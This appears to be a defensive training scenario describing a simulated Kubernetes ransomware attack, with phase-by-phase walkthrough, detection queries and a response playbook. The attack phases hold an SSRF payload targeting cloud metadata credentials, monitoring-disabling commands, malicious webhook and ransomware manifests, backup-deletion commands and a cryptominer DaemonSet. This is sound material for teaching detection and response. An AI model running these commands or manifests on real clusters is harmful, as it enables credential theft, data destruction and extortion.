Skip to content

SC-067: Cloud-Native Ransomware — Kubernetes Cluster Takeover

Scenario Overview

Field Detail
ID SC-067
Category Cloud / Ransomware
Severity Critical
ATT&CK Tactics Initial Access, Execution, Persistence, Privilege Escalation, Defense Evasion, Impact
ATT&CK Techniques T1190, T1609, T1610, T1611, T1053.007, T1078.004, T1485, T1486, T1496, T1562.001
Target Environment Kubernetes clusters (EKS/AKS/GKE), container registries, cloud storage, etcd datastores
Estimated Impact Complete cluster compromise; encryption of persistent volumes and etcd; destruction of backups in cloud storage; cryptomining on hijacked compute; ransom demand in cryptocurrency

Narrative

CloudScale Inc., a SaaS fintech company providing payment processing APIs to over 2,000 merchant clients, operates its production infrastructure on a multi-cluster Kubernetes environment. Their primary production cluster runs on a managed Kubernetes service with 340 worker nodes processing approximately 4 million API transactions daily. On a Tuesday morning, CloudScale's SRE team receives alerts that multiple production pods are entering CrashLoopBackOff status, and the Kubernetes API server is responding with unusual latency.

Within 30 minutes, the scope of the incident becomes clear: a threat actor group calling themselves CLOUD KRAKEN has executed a sophisticated cloud-native ransomware attack. Unlike traditional ransomware that encrypts files on individual hosts, CLOUD KRAKEN's attack is architected specifically for Kubernetes environments. The attacker exploited a server-side request forgery (SSRF) vulnerability in a customer-facing microservice to access the cloud provider's instance metadata service (IMDS), obtained IAM credentials, escalated privileges to cluster-admin, and deployed a custom ransomware operator across all namespaces.

The ransomware operator — a malicious Kubernetes controller — systematically encrypts all PersistentVolume data, overwrites etcd snapshots, deletes cloud storage backups in the S3-compatible bucket at s3://cloudscale-backups.example.com, and deploys cryptomining containers on every available node to monetize the compromised infrastructure while the ransom negotiation proceeds. A ransom note is injected as a ConfigMap in every namespace, demanding 75 BTC (approximately $4.2M) for the decryption key and a promise not to leak the 2.3 TB of customer payment data already exfiltrated.

Attack Flow

graph TD
    A[Phase 1: Initial Access<br/>SSRF to IMDS credential theft] --> B[Phase 2: Privilege Escalation<br/>IAM role chaining to cluster-admin]
    B --> C[Phase 3: Reconnaissance<br/>Kubernetes API enumeration]
    C --> D[Phase 4: Defense Evasion<br/>Disable logging and monitoring]
    D --> E[Phase 5: Persistence<br/>Deploy malicious admission webhook]
    E --> F[Phase 6: Ransomware Deployment<br/>Custom Kubernetes operator]
    F --> G[Phase 7: Data Encryption<br/>PersistentVolume and etcd encryption]
    G --> H[Phase 8: Backup Destruction<br/>Delete cloud storage backups]
    H --> I[Phase 9: Cryptomining<br/>Deploy miners on all nodes]
    I --> J[Phase 10: Ransom Demand<br/>ConfigMap ransom notes]

Phase Details

Phase 1: Initial Access — SSRF to IMDS Credential Theft

ATT&CK Technique: T1190 (Exploit Public-Facing Application)

CLOUD KRAKEN identifies an SSRF vulnerability in CloudScale Inc.'s payment webhook processing service, running in the payments namespace. The vulnerable endpoint at https://api.cloudscale.example.com/v2/webhooks/validate accepts a URL parameter and makes server-side HTTP requests to validate merchant callback URLs. The attacker exploits this to query the cloud provider's Instance Metadata Service:

# Simulated SSRF exploitation (educational only)
POST https://api.cloudscale.example.com/v2/webhooks/validate
Content-Type: application/json
Authorization: Bearer eyJ0eXAi...  (valid merchant API key)

{
  "callback_url": "http://169.254.169.254/latest/meta-data/iam/security-credentials/eks-node-role",
  "event_type": "payment.completed"
}

# Response contains temporary IAM credentials:
{
  "AccessKeyId": "AKIAIOSFODNN7EXAMPLE",
  "SecretAccessKey": "wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY",
  "Token": "IQoJb3JpZ2luX2VjE...",
  "Expiration": "2026-04-03T08:45:00Z"
}

Root Cause: The pod's service account had an IAM role attached via IRSA (IAM Roles for Service Accounts), but the node-level IMDS endpoint was not restricted with IMDSv2 hop limit enforcement. Additionally, the webhook validation service did not implement SSRF protections (no URL scheme validation, no private IP range blocking).

Phase 2: Privilege Escalation — IAM Role Chaining

ATT&CK Technique: T1078.004 (Valid Accounts: Cloud Accounts), T1068 (Exploitation for Privilege Escalation)

The stolen IAM credentials belong to the EKS node role, which has permissions to describe and list cluster resources. CLOUD KRAKEN discovers an overly permissive IAM policy that allows the node role to assume a CI/CD pipeline role (arn:aws:iam::123456789012:role/cicd-pipeline-role) used by the deployment automation. This CI/CD role has cluster-admin ClusterRoleBinding in the EKS cluster:

# Simulated IAM role chain (educational only)
# Step 1: Use node role credentials to assume CI/CD role
$ aws sts assume-role \
    --role-arn "arn:aws:iam::123456789012:role/cicd-pipeline-role" \
    --role-session-name "node-maintenance"

# Step 2: Use CI/CD role to obtain cluster-admin kubeconfig
$ aws eks update-kubeconfig \
    --name cloudscale-prod \
    --region us-east-1 \
    --role-arn "arn:aws:iam::123456789012:role/cicd-pipeline-role"

# Step 3: Verify cluster-admin access
$ kubectl auth can-i '*' '*' --all-namespaces
# yes

Phase 3: Reconnaissance — Kubernetes API Enumeration

ATT&CK Technique: T1613 (Container and Resource Discovery)

With cluster-admin access, CLOUD KRAKEN enumerates the entire Kubernetes environment to plan the ransomware deployment:

# Simulated cluster reconnaissance (educational only)
$ kubectl get namespaces
NAME              STATUS   AGE
default           Active   487d
kube-system       Active   487d
payments          Active   412d
merchant-portal   Active   398d
data-pipeline     Active   356d
monitoring        Active   340d
backup-system     Active   298d
cert-manager      Active   487d

$ kubectl get pv
NAME                 CAPACITY   ACCESS MODES   STATUS   CLAIM
pv-payments-db       500Gi      RWO            Bound    payments/postgres-data
pv-merchant-db       200Gi      RWO            Bound    merchant-portal/mysql-data
pv-analytics         1Ti        RWX            Bound    data-pipeline/analytics-store
pv-etcd-backup       100Gi      RWO            Bound    kube-system/etcd-snapshot
...
# Total: 47 PersistentVolumes, 2.8 TB total storage

$ kubectl get secrets --all-namespaces | wc -l
# 234 secrets across all namespaces

$ kubectl get nodes
# 340 worker nodes — target for cryptomining deployment

Phase 4: Defense Evasion — Disable Monitoring and Logging

ATT&CK Technique: T1562.001 (Impair Defenses: Disable or Modify Tools)

Before deploying the ransomware payload, CLOUD KRAKEN disables security monitoring to delay detection:

# Simulated defense evasion actions (educational only)

# 1. Scale down monitoring stack
# kubectl scale deployment prometheus-server -n monitoring --replicas=0
# kubectl scale deployment alertmanager -n monitoring --replicas=0
# kubectl scale deployment grafana -n monitoring --replicas=0

# 2. Delete Falco DaemonSet (runtime security)
# kubectl delete daemonset falco -n kube-system

# 3. Modify FluentBit log shipping to drop audit logs
# kubectl edit configmap fluent-bit-config -n kube-system
# (add filter to drop kubernetes audit log entries)

# 4. Disable Kubernetes audit logging webhook
# kubectl delete validatingwebhookconfiguration audit-webhook

The attacker also creates a NetworkPolicy that blocks egress from the monitoring namespace to prevent any remaining monitoring components from sending alerts:

apiVersion: networking.k8s.io/v1
kind: NetworkPolicy
metadata:
  name: block-monitoring-egress
  namespace: monitoring
spec:
  podSelector: {}
  policyTypes:
    - Egress
  egress: []  # Block all egress

Phase 5: Persistence — Malicious Admission Webhook

ATT&CK Technique: T1053.007 (Scheduled Task/Job: Container Orchestration Job)

CLOUD KRAKEN deploys a mutating admission webhook that injects a sidecar container into every new pod created in the cluster. This ensures persistence even if the primary ransomware operator is discovered and removed — any new pod deployment will be infected:

# Simulated malicious admission webhook (educational only)
apiVersion: admissionregistration.k8s.io/v1
kind: MutatingWebhookConfiguration
metadata:
  name: pod-policy-controller  # Innocuous name
webhooks:
  - name: policy.cloudscale.example.com
    clientConfig:
      service:
        name: policy-controller
        namespace: kube-system
        path: /mutate
      caBundle: LS0tLS1CRUdJTi...  # Attacker-controlled CA
    rules:
      - operations: ["CREATE"]
        apiGroups: [""]
        apiVersions: ["v1"]
        resources: ["pods"]
    sideEffects: None
    admissionReviewVersions: ["v1"]
    failurePolicy: Ignore  # Don't block pods if webhook is down

Phase 6: Ransomware Operator Deployment

ATT&CK Technique: T1609 (Container Administration Command), T1610 (Deploy Container)

CLOUD KRAKEN deploys a custom Kubernetes operator — a controller pattern that watches for PersistentVolumeClaims and systematically encrypts their contents. The operator is disguised as a legitimate storage management tool:

# Simulated ransomware operator deployment (educational only)
apiVersion: apps/v1
kind: Deployment
metadata:
  name: storage-lifecycle-manager  # Disguised name
  namespace: kube-system
  labels:
    app.kubernetes.io/name: storage-manager
    app.kubernetes.io/part-of: cluster-maintenance
spec:
  replicas: 3  # HA for reliability
  selector:
    matchLabels:
      app: storage-lifecycle-manager
  template:
    metadata:
      labels:
        app: storage-lifecycle-manager
    spec:
      serviceAccountName: storage-admin  # Created with PV access
      containers:
        - name: manager
          image: registry.example.com/tools/storage-mgr:2.1.4
          # Image contains ransomware payload
          env:
            - name: ENCRYPTION_KEY_ID
              value: "kr4k3n-2026-04-03"  # Attacker's encryption key reference
            - name: TARGET_NAMESPACES
              value: "payments,merchant-portal,data-pipeline,backup-system"
            - name: RANSOM_WALLET
              value: "bc1qEXAMPLExxxxxxxxxxxxxxxxxxxxxxxxx"
          volumeMounts:
            - name: host-root
              mountPath: /host
              readOnly: false
      volumes:
        - name: host-root
          hostPath:
            path: /
            type: Directory

Phase 7: Data Encryption — PersistentVolumes and etcd

ATT&CK Technique: T1486 (Data Encrypted for Impact)

The ransomware operator systematically encrypts data across the cluster:

  1. PersistentVolume encryption: Mounts each PV via hostPath and encrypts all files using AES-256-GCM with a unique key per volume. The key is encrypted with the attacker's RSA-4096 public key and stored alongside the encrypted data.

  2. etcd snapshot encryption: Connects to the etcd cluster endpoint and takes a snapshot, encrypts it, then corrupts the live etcd data to prevent cluster recovery.

  3. ConfigMap/Secret destruction: Deletes all ConfigMaps and Secrets in non-system namespaces, removing application configuration and credentials needed for recovery.

# Simulated encryption progress log (educational only)
[2026-04-03T04:12:33Z] INFO  Encrypting PV: pv-payments-db (500Gi) — namespace: payments
[2026-04-03T04:18:47Z] INFO  Encrypted: pv-payments-db — 487 GB processed — key wrapped
[2026-04-03T04:18:49Z] INFO  Encrypting PV: pv-merchant-db (200Gi) — namespace: merchant-portal
[2026-04-03T04:22:15Z] INFO  Encrypted: pv-merchant-db — 183 GB processed — key wrapped
[2026-04-03T04:22:17Z] INFO  Encrypting PV: pv-analytics (1Ti) — namespace: data-pipeline
[2026-04-03T04:45:02Z] INFO  Encrypted: pv-analytics — 891 GB processed — key wrapped
[2026-04-03T04:45:05Z] INFO  etcd snapshot captured and encrypted
[2026-04-03T04:45:33Z] INFO  ConfigMaps deleted: 127 across 4 namespaces
[2026-04-03T04:45:34Z] INFO  Secrets deleted: 89 across 4 namespaces
[2026-04-03T04:45:35Z] INFO  Phase 7 complete — 47 PVs encrypted — 2.8 TB total

Phase 8: Backup Destruction

ATT&CK Technique: T1485 (Data Destruction)

Using the cluster-admin IAM credentials, CLOUD KRAKEN identifies and destroys all backup infrastructure:

# Simulated backup destruction (educational only)
# 1. Delete S3 backup bucket contents
$ aws s3 rm s3://cloudscale-backups.example.com --recursive
# Deleted: 847 objects (etcd snapshots, PV backups, config exports)

# 2. Delete Velero backup resources
$ kubectl delete backups.velero.io --all -n backup-system
$ kubectl delete schedules.velero.io --all -n backup-system

# 3. Delete VolumeSnapshot resources
$ kubectl delete volumesnapshots --all --all-namespaces
# Deleted: 142 snapshots across 6 namespaces

# 4. Remove S3 bucket versioning to prevent object recovery
$ aws s3api put-bucket-versioning \
    --bucket cloudscale-backups.example.com \
    --versioning-configuration Status=Suspended

# 5. Delete version history
$ aws s3api delete-objects --bucket cloudscale-backups.example.com \
    --delete "$(aws s3api list-object-versions \
    --bucket cloudscale-backups.example.com \
    --query '{Objects: Versions[].{Key:Key,VersionId:VersionId}}')"

Phase 9: Cryptomining Deployment

ATT&CK Technique: T1496 (Resource Hijacking)

While the ransom negotiation proceeds, CLOUD KRAKEN monetizes the compromised infrastructure by deploying XMRig cryptominers as a DaemonSet across all 340 worker nodes:

# Simulated cryptomining DaemonSet (educational only)
apiVersion: apps/v1
kind: DaemonSet
metadata:
  name: node-health-monitor  # Disguised name
  namespace: kube-system
spec:
  selector:
    matchLabels:
      app: node-health
  template:
    metadata:
      labels:
        app: node-health
    spec:
      tolerations:
        - operator: Exists  # Run on ALL nodes including masters
      containers:
        - name: monitor
          image: registry.example.com/tools/node-monitor:1.0.0
          # Contains XMRig binary
          resources:
            requests:
              cpu: "3500m"  # Consume most of node CPU
              memory: "2Gi"
            limits:
              cpu: "3800m"
              memory: "4Gi"
          env:
            - name: POOL_URL
              value: "stratum+tcp://pool.example.com:3333"
            - name: WALLET
              value: "4EXAMPLE_MONERO_WALLET_ADDRESS_EXAMPLE"

Phase 10: Ransom Demand

ATT&CK Technique: T1491.001 (Defacement: Internal Defacement)

CLOUD KRAKEN deploys ransom notes as ConfigMaps in every namespace and modifies the cluster's default service to display the ransom message:

# Simulated ransom note ConfigMap (educational only)
apiVersion: v1
kind: ConfigMap
metadata:
  name: URGENT-READ-IMMEDIATELY
  namespace: payments
data:
  README.txt: |
    ╔══════════════════════════════════════════════════════╗
    ║              CLOUD KRAKEN RANSOMWARE                 ║
    ║                                                      ║
    ║  Your Kubernetes cluster has been encrypted.          ║
    ║  All PersistentVolumes, etcd, and backups are         ║
    ║  encrypted with AES-256-GCM + RSA-4096.              ║
    ║                                                      ║
    ║  We have also exfiltrated 2.3 TB of customer         ║
    ║  payment data including PANs and PII.                ║
    ║                                                      ║
    ║  To recover your data and prevent public release:     ║
    ║  - Send 75 BTC to: bc1qEXAMPLExxxxxxxxxxxxxxxxxxx   ║
    ║  - Contact: kraken@onion.example.com                 ║
    ║  - Deadline: 72 hours                                ║
    ║                                                      ║
    ║  Proof of decryption available upon request.          ║
    ╚══════════════════════════════════════════════════════╝

Detection Opportunities

KQL Detection — SSRF to IMDS

// Detect pod-level requests to cloud instance metadata service
ContainerLog
| where LogEntry has "169.254.169.254"
    or LogEntry has "metadata.google.internal"
    or LogEntry has "169.254.169.254/latest/meta-data"
| project TimeGenerated, ContainerID, PodName, Namespace = ContainerGroup, LogEntry
| extend TargetEndpoint = extract("(http[s]?://[^\\s]+)", 1, LogEntry)
| where TargetEndpoint has "iam" or TargetEndpoint has "credentials"
| sort by TimeGenerated desc

KQL Detection — Monitoring Stack Scaled to Zero

// Detect scaling of monitoring deployments to zero replicas
KubeEvents
| where ObjectKind == "Deployment"
| where Namespace == "monitoring" or Namespace == "kube-system"
| where Reason == "ScalingReplicaSet"
| where Message has "Scaled down" and Message has "to 0"
| project TimeGenerated, ObjectKind, Name, Namespace, Message, SourceComponent
| sort by TimeGenerated desc

KQL Detection — Suspicious DaemonSet Deployment

// Detect DaemonSet creation in kube-system with high resource requests
KubeEvents
| where ObjectKind == "DaemonSet"
| where Reason == "SuccessfulCreate"
| where Namespace == "kube-system"
| project TimeGenerated, Name, Namespace, Message
| join kind=inner (
    KubePodInventory
    | where Namespace == "kube-system"
    | where ContainerStatus == "running"
    | extend CPURequest = parse_json(ContainerResourceRequests).cpu
    | where CPURequest > 2000  // Suspicious high CPU request
    | project PodName = Name, CPURequest, ContainerName
) on $left.Name == $right.ContainerName
| sort by TimeGenerated desc

SPL Detection — Kubernetes Audit Log Anomalies

index=kubernetes sourcetype=kube:apiserver:audit
| where verb IN ("create", "delete", "patch")
| where objectRef.resource IN ("daemonsets", "deployments", "mutatingwebhookconfigurations")
| where objectRef.namespace="kube-system"
| eval is_suspicious=case(
    objectRef.resource="mutatingwebhookconfigurations", "HIGH",
    objectRef.resource="daemonsets" AND verb="create", "HIGH",
    objectRef.resource="deployments" AND verb="delete" AND objectRef.name LIKE "%monitor%", "CRITICAL",
    1=1, "LOW"
)
| where is_suspicious IN ("HIGH", "CRITICAL")
| stats count by user.username, verb, objectRef.resource, objectRef.name, objectRef.namespace, is_suspicious, _time
| sort -_time

SPL Detection — Cloud Storage Backup Deletion

index=cloudtrail sourcetype=aws:cloudtrail eventName IN ("DeleteObject", "DeleteBucket", "PutBucketVersioning")
| where requestParameters.bucketName="*backup*"
| stats count as api_calls,
    dc(requestParameters.key) as unique_objects_deleted,
    values(eventName) as actions
    by userIdentity.arn, sourceIPAddress, requestParameters.bucketName
| where api_calls > 50
| sort -api_calls
| rename userIdentity.arn as "IAM Identity", sourceIPAddress as "Source IP", requestParameters.bucketName as "Bucket"

Sigma Rule — Container Escape via Host Mount

title: Kubernetes Pod with Host Root Filesystem Mount
id: 5e6f7a8b-9c0d-1e2f-3a4b-5c6d7e8f9a0b
status: experimental
description: Detects creation of Kubernetes pods with hostPath volume mounting the root filesystem, indicating potential container escape
author: Nexus SecOps
date: 2026/04/03
references:
    - https://attack.mitre.org/techniques/T1611/
    - https://attack.mitre.org/techniques/T1610/
logsource:
    category: application
    product: kubernetes
    service: audit
detection:
    selection:
        verb: create
        objectRef.resource: pods
    selection_hostpath:
        requestObject.spec.volumes[].hostPath.path: '/'
    filter_system:
        objectRef.namespace:
            - 'kube-system'
        user.username|contains:
            - 'system:node'
            - 'kube-controller'
    condition: selection and selection_hostpath and not filter_system
falsepositives:
    - Legitimate node maintenance pods
    - Container storage interface (CSI) drivers
level: critical
tags:
    - attack.privilege_escalation
    - attack.t1611

Sigma Rule — Mass Kubernetes Secret Deletion

title: Bulk Deletion of Kubernetes Secrets
id: 1a2b3c4d-5e6f-7a8b-9c0d-1e2f3a4b5c6d
status: experimental
description: Detects bulk deletion of Kubernetes secrets across multiple namespaces, indicating potential ransomware or destructive attack
author: Nexus SecOps
date: 2026/04/03
references:
    - https://attack.mitre.org/techniques/T1485/
    - https://attack.mitre.org/techniques/T1486/
logsource:
    category: application
    product: kubernetes
    service: audit
detection:
    selection:
        verb: delete
        objectRef.resource: secrets
    timeframe: 5m
    condition: selection | count() by user.username > 10
falsepositives:
    - Namespace cleanup during decommissioning
    - Automated secret rotation deleting old versions
level: critical
tags:
    - attack.impact
    - attack.t1485
    - attack.t1486

Response Playbook

  1. Immediate Cluster Isolation: Restrict the Kubernetes API server to known management IPs only. Revoke all cloud IAM credentials associated with the cluster nodes and service accounts. Rotate the cluster CA certificate if possible.
  2. Contain Cryptomining: Identify and delete the cryptomining DaemonSet. Verify node CPU utilization returns to baseline. Block outbound connections to mining pools at the VPC/security group level.
  3. Remove Malicious Webhooks: Delete all mutating and validating admission webhooks not in the organization's approved baseline. Audit kube-system namespace for unauthorized deployments.
  4. Ransomware Operator Removal: Delete the ransomware operator deployment and all associated ServiceAccounts, ClusterRoles, and ClusterRoleBindings. Verify no CronJobs or Jobs remain.
  5. Assess Encryption Scope: Inventory all PersistentVolumes and determine which have been encrypted. Check etcd cluster health and snapshot availability.
  6. Backup Recovery: If cloud storage backups were deleted but bucket versioning was previously enabled, attempt to recover deleted object versions. Check for cross-region replication copies. Contact cloud provider support for recovery assistance.
  7. IAM Credential Rotation: Rotate all IAM roles, access keys, and service account tokens. Implement IMDSv2 with hop limit of 1 on all nodes. Review and restrict IAM role assumption chains.
  8. SSRF Remediation: Patch the vulnerable webhook validation endpoint. Implement URL validation that blocks requests to RFC 1918 ranges, link-local addresses (169.254.x.x), and cloud metadata endpoints.
  9. Network Policy Enforcement: Deploy default-deny NetworkPolicies in all namespaces. Implement egress restrictions to prevent pods from accessing the IMDS endpoint.
  10. RBAC Hardening: Remove cluster-admin bindings from CI/CD service accounts. Implement namespace-scoped roles with least privilege. Enable Kubernetes audit logging to a tamper-resistant external destination.
  11. Immutable Backup Strategy: Implement backup storage with object lock (WORM) that prevents deletion even with administrative credentials. Use cross-account backup replication.
  12. Regulatory Notification: If customer payment data (PCI DSS scope) was exfiltrated, initiate breach notification procedures. Engage PCI Forensic Investigator (PFI). Notify affected card brands and acquiring banks.

Lessons Learned

  • Cloud-native attacks require cloud-native defenses. Traditional endpoint security tools are blind to Kubernetes-native attack patterns. Organizations need runtime security (Falco, Sysdig), Kubernetes-aware SIEM, and cloud workload protection platforms.
  • IMDS credential theft via SSRF is the cloud equivalent of lateral movement. Enforcing IMDSv2 with a hop limit of 1 and blocking pod access to the metadata endpoint via NetworkPolicy eliminates this entire attack vector.
  • Overpermissive IAM role chaining creates blast radius amplification. A node role that can assume a CI/CD role with cluster-admin creates an implicit privilege escalation path. IAM role trust policies must be reviewed as attack paths, not just access policies.
  • Backups are a primary ransomware target, not a recovery guarantee. Cloud storage backups without object lock, cross-account replication, and deletion protection are vulnerable to the same credentials used to compromise the production environment.
  • Kubernetes admission controllers are both a defense and an attack surface. Mutating webhooks provide powerful security enforcement but can also be weaponized for persistence. Admission webhook configurations should be immutable and monitored.
  • Monitoring infrastructure must be self-protecting. If an attacker can scale down Prometheus and delete Falco with the same cluster-admin credentials used for the attack, monitoring provides no value. Monitoring should run in a separate trust domain.

Nexus SecOps References